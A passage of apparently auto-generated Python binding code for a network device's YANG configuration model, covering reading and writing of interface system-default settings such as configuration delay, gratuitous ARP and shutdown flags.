xmlVal.setXmlTag(("interface", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if"))
keyPath.addKeyPathPrefix(xmlVal)
xmlVal = Value()
xmlVal.setXmlTag(("interfaces", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if"))
keyPath.addKeyPathPrefix(xmlVal)
xmlVal = Value()
xmlVal.setXmlTag(("tech", "http://qwilt.com/ns/yang/device/tech/qwilt-tech", "qt"))
keyPath.addKeyPathPrefix(xmlVal)
for logFunc in self._log('get-self-key-path-done').debug3Func(): logFunc('done. keyPath=%s. PARAMS', keyPath)
return keyPath
def _internalWrite (self,
interface,
trxContext):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('internal-write').debug3Func(): logFunc('called. PARAMS')
tagValueList = TagValues()
res = self._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('write-fill-write-tag-value-failed').errorFunc(): logFunc('_fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
itemsToDelete = []
res = self._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('write-collect-items-to-delete-failed').errorFunc(): logFunc('_collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
keyPath = self._getSelfKeyPath(interface,
None)
res = self.domain.writeMaapi(tagValueList, keyPath, trxContext, itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('write-domain-failed').errorFunc(): logFunc('domain.writeMaapi() failed. PARAMS')
return ReturnCodes.kGeneralError
for logFunc in self._log('internal-write-done').debug3Func(): logFunc('done. PARAMS')
return ReturnCodes.kOk
def _internalRead (self,
interface,
readAllOrFail,
trxContext):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('internal-read').debug3Func(): logFunc('called. PARAMS, readAllOrFail=%s', readAllOrFail)
if readAllOrFail:
self._clearAllReadData()
tagValueList = TagValues()
res = self._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-fill-read-tag-value-failed').errorFunc(): logFunc('_fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
keyPath = self._getSelfKeyPath(interface,
None)
res = self.domain.readMaapi(tagValueList, keyPath, trxContext)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-domain-failed').errorFunc(): logFunc('domain.readMaapi() failed. PARAMS')
return ReturnCodes.kGeneralError
res = self._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-read-tag-values-failed').errorFunc(): logFunc('_readTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
for logFunc in self._log('internal-read-done').debug3Func(): logFunc('done. PARAMS, readAllOrFail=%s', readAllOrFail)
return ReturnCodes.kOk
def _collectItemsToDelete (self,
interface,
itemsToDelete):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('collect-items-to-delete').debug3Func(): logFunc('called: itemsToDelete=%s. PARAMS', itemsToDelete)
if self.contentObj:
res = self.contentObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-content-failed').errorFunc(): logFunc('contentObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.connectivityCheckObj:
res = self.connectivityCheckObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.managementObj:
res = self.managementObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-management-failed').errorFunc(): logFunc('managementObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.linkObj:
res = self.linkObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-link-failed').errorFunc(): logFunc('linkObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.deviceObj:
res = self.deviceObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-device-failed').errorFunc(): logFunc('deviceObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
for logFunc in self._log('collect-items-to-delete-done').debug3Func(): logFunc('done: itemsToDelete=%s. PARAMS', itemsToDelete)
return ReturnCodes.kOk
def _fillWriteTagValues (self, tagValueList):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('fill-write-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)
if self.hasConfigurationDelay():
valConfigurationDelay = Value()
if self.configurationDelay is not None:
valConfigurationDelay.setUint64(self.configurationDelay)
else:
valConfigurationDelay.setEmpty()
tagValueList.push(("configuration-delay", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valConfigurationDelay)
if self.hasMuteReporting():
valMuteReporting = Value()
if self.muteReporting is not None:
valMuteReporting.setBool(self.muteReporting)
else:
valMuteReporting.setEmpty()
tagValueList.push(("mute-reporting", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valMuteReporting)
if self.hasSendGratuitousArp():
valSendGratuitousArp = Value()
if self.sendGratuitousArp is not None:
valSendGratuitousArp.setBool(self.sendGratuitousArp)
else:
valSendGratuitousArp.setEmpty()
tagValueList.push(("send-gratuitous-arp", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valSendGratuitousArp)
if self.hasShutdown():
valShutdown = Value()
if self.shutdown is not None:
valShutdown.setBool(self.shutdown)
else:
valShutdown.setEmpty()
tagValueList.push(("shutdown", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valShutdown)
if self.hasTechMode():
valTechMode = Value()
if self.techMode is not None:
valTechMode.setBool(self.techMode)
else:
valTechMode.setEmpty()
tagValueList.push(("tech-mode", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valTechMode)
if self.contentObj:
valBegin = Value()
(tag, ns, prefix) = ("content" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.contentObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-content-failed').errorFunc(): logFunc('contentObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.connectivityCheckObj:
valBegin = Value()
(tag, ns, prefix) = ("connectivity-check" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.connectivityCheckObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.managementObj:
valBegin = Value()
(tag, ns, prefix) = ("management" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.managementObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-management-failed').errorFunc(): logFunc('managementObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.linkObj:
valBegin = Value()
(tag, ns, prefix) = ("link" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.linkObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-link-failed').errorFunc(): logFunc('linkObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.deviceObj:
valBegin = Value()
(tag, ns, prefix) = ("device" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.deviceObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-device-failed').errorFunc(): logFunc('deviceObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
return ReturnCodes.kOk
def _fillReadTagValues (self, tagValueList):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('fill-read-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)
if self.isConfigurationDelayRequested():
valConfigurationDelay = Value()
valConfigurationDelay.setEmpty()
tagValueList.push(("configuration-delay", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valConfigurationDelay)
if self.isMuteReportingRequested():
valMuteReporting = Value()
valMuteReporting.setEmpty()
tagValueList.push(("mute-reporting", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valMuteReporting)
if self.isSendGratuitousArpRequested():
valSendGratuitousArp = Value()
valSendGratuitousArp.setEmpty()
tagValueList.push(("send-gratuitous-arp", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valSendGratuitousArp)
if self.isShutdownRequested():
valShutdown = Value()
valShutdown.setEmpty()
tagValueList.push(("shutdown", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valShutdown)
if self.isTechModeRequested():
valTechMode = Value()
valTechMode.setEmpty()
tagValueList.push(("tech-mode", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valTechMode)
if self.contentObj:
valBegin = Value()
(tag, ns, prefix) = ("content" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.contentObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-content-failed').errorFunc(): logFunc('contentObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.connectivityCheckObj:
valBegin = Value()
(tag, ns, prefix) = ("connectivity-check" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.connectivityCheckObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.managementObj:
valBegin = Value()
(tag, ns, prefix) = ("management" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.managementObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-management-failed').errorFunc(): logFunc('managementObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.linkObj:
valBegin = Value()
(tag, ns, prefix) = ("link" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.linkObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-link-failed').errorFunc(): logFunc('linkObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.deviceObj:
valBegin = Value()
(tag, ns, prefix) = ("device" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.deviceObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-device-failed').errorFunc(): logFunc('deviceObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
return ReturnCodes.kOk
def _readTagValues (self, tagValueList, readAllOrFail):
__pychecker__ = 'maxlines=300'
__pychecker__ = 'maxreturns=30'
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('read-tag-values').debug3Func(): logFunc('called. readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)
res = ReturnCodes.kOk
for logFunc in self._log('read-tag-values-leaves').debug3Func(): logFunc('reading leaves. tagValueList=%s', tagValueList)
if self.isConfigurationDelayRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "configuration-delay") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-configurationdelay').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"configurationDelay", "configuration-delay", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asUint64()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-configuration-delay-bad-value').infoFunc(): logFunc('configurationDelay not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setConfigurationDelay(tempVar)
for logFunc in self._log('read-tag-values-configuration-delay').debug3Func(): logFunc('read configurationDelay. configurationDelay=%s, tempValue=%s', self.configurationDelay, tempValue.getType())
if self.isMuteReportingRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "mute-reporting") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-mutereporting').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"muteReporting", "mute-reporting", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-mute-reporting-bad-value').infoFunc(): logFunc('muteReporting not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setMuteReporting(tempVar)
for logFunc in self._log('read-tag-values-mute-reporting').debug3Func(): logFunc('read muteReporting. muteReporting=%s, tempValue=%s', self.muteReporting, tempValue.getType())
if self.isSendGratuitousArpRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "send-gratuitous-arp") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-sendgratuitousarp').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"sendGratuitousArp", "send-gratuitous-arp", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-send-gratuitous-arp-bad-value').infoFunc(): logFunc('sendGratuitousArp not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setSendGratuitousArp(tempVar)
for logFunc in self._log('read-tag-values-send-gratuitous-arp').debug3Func(): logFunc('read sendGratuitousArp. sendGratuitousArp=%s, tempValue=%s', self.sendGratuitousArp, tempValue.getType())
if self.isShutdownRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "shutdown") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-shutdown').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"shutdown", "shutdown", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-shutdown-bad-value').infoFunc(): logFunc('shutdown not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setShutdown(tempVar)
for logFunc in self._log('read-tag-values-shutdown').debug3Func(): logFunc('read shutdown. shutdown=%s, tempValue=%s', self.shutdown, tempValue.getType())
if self.isTechModeRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "tech-mode") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-techmode').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"techMode", "tech-mode", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-tech-mode-bad-value').infoFunc(): logFunc('techMode not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setTechMode(tempVar)
for logFunc in self._log('read-tag-values-tech-mode').debug3Func(): logFunc('read techMode. techMode=%s, tempValue=%s', self.techMode, tempValue.getType())
if self.contentObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "content") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"content", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.contentObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-content-failed').errorFunc(): logFunc('contentObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "content") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"content", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.connectivityCheckObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "connectivity-check") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"connectivity-check", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.connectivityCheckObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "connectivity-check") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"connectivity-check", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.managementObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "management") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"management", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.managementObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-management-failed').errorFunc(): logFunc('managementObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "management") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"management", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.linkObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "link") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"link", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.linkObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-link-failed').errorFunc(): logFunc('linkObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "link") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"link", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.deviceObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "device") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"device", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.deviceObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-device-failed').errorFunc(): logFunc('deviceObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "device") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"device", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
for logFunc in self._log('read-tag-values-done').debug3Func(): logFunc('done. readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)
return ReturnCodes.kOk
"""
Extracted from the below data:
{
"node": {
"name": "systemDefaults",
"namespace": "system_defaults",
"className": "SystemDefaultsMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.system_defaults_maapi_gen import SystemDefaultsMaapi",
"baseClassName": "SystemDefaultsMaapiBase",
"baseModule": "system_defaults_maapi_base_gen"
},
"ancestors": [
{
"moduleYangNamespacePrefix": "qt",
"yangName": "tech",
"namespace": "tech",
"isCurrent": false,
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech",
"name": "tech"
},
{
"moduleYangNamespacePrefix": "qt-if",
"yangName": "interfaces",
"namespace": "interfaces",
"isCurrent": false,
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"name": "interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"isCurrent": false,
"yangName": "interface",
"namespace": "interface",
"isList": true,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"keyLeaf": {
"varName": "interface",
"defaultVal": null,
"typeHandler": "handler: StringHandler"
},
"name": "interface"
},
{
"moduleYangNamespacePrefix": "qt-if",
"yangName": "system-defaults",
"namespace": "system_defaults",
"isCurrent": true,
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"name": "system-defaults"
}
],
"descendants": [
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "content",
"yangName": "content",
"className": "BlinkyContentMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.content.content_maapi_gen import BlinkyContentMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "connectivityCheck",
"yangName": "connectivity-check",
"className": "BlinkyConnectivityCheckMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.connectivity_check.connectivity_check_maapi_gen import BlinkyConnectivityCheckMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "management",
"yangName": "management",
"className": "BlinkyManagementMaapi",
